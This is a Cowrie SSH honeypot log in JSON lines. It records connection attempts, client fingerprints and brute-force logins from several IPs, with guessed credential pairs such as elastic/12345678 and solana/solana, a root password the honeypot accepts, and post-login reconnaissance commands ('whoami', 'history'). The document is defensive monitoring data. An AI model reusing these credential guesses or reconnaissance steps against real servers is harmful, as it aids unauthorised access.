{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:06:03.584610Z","src_ip":"212.227.125.160","session":"331172a2fc68"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"1234567","message":"login attempt [elastic/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:06:05.370226Z","src_ip":"212.227.125.160","session":"331172a2fc68"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:06:07.089607Z","src_ip":"212.227.125.160","session":"331172a2fc68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45600,"dst_ip":"1.2.3.4","dst_port":22,"session":"c44da8b0b0db","protocol":"ssh","message":"New connection: 212.227.235.229:45600 (1.2.3.4:22) [session: c44da8b0b0db]","sensor":"my-vps","timestamp":"2025-08-31T02:06:41.011124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:06:43.300467Z","src_ip":"212.227.235.229","session":"c44da8b0b0db"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:06:43.301603Z","src_ip":"212.227.235.229","session":"c44da8b0b0db"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"12345678","message":"login attempt [elastic/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:06:48.243788Z","src_ip":"212.227.235.229","session":"c44da8b0b0db"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:06:50.129820Z","src_ip":"212.227.235.229","session":"c44da8b0b0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36666,"dst_ip":"1.2.3.4","dst_port":22,"session":"46d2d9f32083","protocol":"ssh","message":"New connection: 212.227.125.160:36666 (1.2.3.4:22) [session: 46d2d9f32083]","sensor":"my-vps","timestamp":"2025-08-31T02:07:02.906984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:07:03.538834Z","src_ip":"212.227.125.160","session":"46d2d9f32083"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:07:03.539662Z","src_ip":"212.227.125.160","session":"46d2d9f32083"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"12345678","message":"login attempt [elastic/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:07:06.232435Z","src_ip":"212.227.125.160","session":"46d2d9f32083"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:07:08.067765Z","src_ip":"212.227.125.160","session":"46d2d9f32083"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.83.78","src_port":46198,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a9d18b00383","protocol":"ssh","message":"New connection: 203.195.83.78:46198 (1.2.3.4:22) [session: 0a9d18b00383]","sensor":"my-vps","timestamp":"2025-08-31T02:07:31.304103Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56248,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb16d01e0270","protocol":"ssh","message":"New connection: 212.227.235.229:56248 (1.2.3.4:22) [session: fb16d01e0270]","sensor":"my-vps","timestamp":"2025-08-31T02:07:41.751616Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36686,"dst_ip":"1.2.3.4","dst_port":22,"session":"f75aa53600ab","protocol":"ssh","message":"New connection: 212.227.125.160:36686 (1.2.3.4:22) [session: f75aa53600ab]","sensor":"my-vps","timestamp":"2025-08-31T02:07:41.971231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:07:42.935154Z","src_ip":"212.227.235.229","session":"fb16d01e0270"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:07:42.936556Z","src_ip":"212.227.235.229","session":"fb16d01e0270"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:07:43.402504Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:07:43.403763Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456789","message":"login attempt [elastic/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:07:48.832051Z","src_ip":"212.227.235.229","session":"fb16d01e0270"}
{"eventid":"cowrie.login.success","username":"root","password":"As7r0nau7@","message":"login attempt [root/As7r0nau7@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:07:50.294931Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:07:50.783946Z","src_ip":"212.227.235.229","session":"fb16d01e0270"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:07:52.721253Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T02:07:52.722119Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:07:53.957068Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:07:53.958174Z","src_ip":"212.227.125.160","session":"f75aa53600ab"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":52714,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f3aa3dafede","protocol":"ssh","message":"New connection: 201.148.180.50:52714 (1.2.3.4:22) [session: 1f3aa3dafede]","sensor":"my-vps","timestamp":"2025-08-31T02:08:00.882984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:08:01.691098Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:08:01.691893Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46900,"dst_ip":"1.2.3.4","dst_port":22,"session":"95414e18a5ea","protocol":"ssh","message":"New connection: 212.227.125.160:46900 (1.2.3.4:22) [session: 95414e18a5ea]","sensor":"my-vps","timestamp":"2025-08-31T02:08:03.944731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:08:04.562405Z","src_ip":"212.227.125.160","session":"95414e18a5ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:08:04.577766Z","src_ip":"212.227.125.160","session":"95414e18a5ea"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456789","message":"login attempt [elastic/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:08:07.313673Z","src_ip":"212.227.125.160","session":"95414e18a5ea"}
{"eventid":"cowrie.login.success","username":"root","password":"As7r0nau7@","message":"login attempt [root/As7r0nau7@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:08:07.644519Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:08.881279Z","src_ip":"212.227.125.160","session":"95414e18a5ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:08:09.592295Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T02:08:09.593070Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:10.344244Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:10.345456Z","src_ip":"201.148.180.50","session":"1f3aa3dafede"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37314,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2fbe993e2c3","protocol":"ssh","message":"New connection: 212.227.235.229:37314 (1.2.3.4:22) [session: c2fbe993e2c3]","sensor":"my-vps","timestamp":"2025-08-31T02:08:30.011945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:08:30.012623Z","src_ip":"212.227.235.229","session":"c2fbe993e2c3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T02:08:30.109136Z","src_ip":"212.227.235.229","session":"c2fbe993e2c3"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-31T02:08:30.400847Z","src_ip":"212.227.235.229","session":"c2fbe993e2c3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:31.500322Z","src_ip":"212.227.235.229","session":"c2fbe993e2c3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54030,"dst_ip":"1.2.3.4","dst_port":22,"session":"a007f1e32b8f","protocol":"ssh","message":"New connection: 217.72.205.35:54030 (1.2.3.4:22) [session: a007f1e32b8f]","sensor":"my-vps","timestamp":"2025-08-31T02:08:32.850272Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:32.851363Z","src_ip":"217.72.205.35","session":"a007f1e32b8f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54746,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa98ede94705","protocol":"ssh","message":"New connection: 41.226.27.251:54746 (1.2.3.4:22) [session: fa98ede94705]","sensor":"my-vps","timestamp":"2025-08-31T02:08:34.730982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:08:34.731753Z","src_ip":"41.226.27.251","session":"fa98ede94705"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:08:34.781496Z","src_ip":"41.226.27.251","session":"fa98ede94705"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:42.731255Z","src_ip":"41.226.27.251","session":"fa98ede94705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37730,"dst_ip":"1.2.3.4","dst_port":22,"session":"328156ad2cd9","protocol":"ssh","message":"New connection: 212.227.235.229:37730 (1.2.3.4:22) [session: 328156ad2cd9]","sensor":"my-vps","timestamp":"2025-08-31T02:08:43.551505Z"}
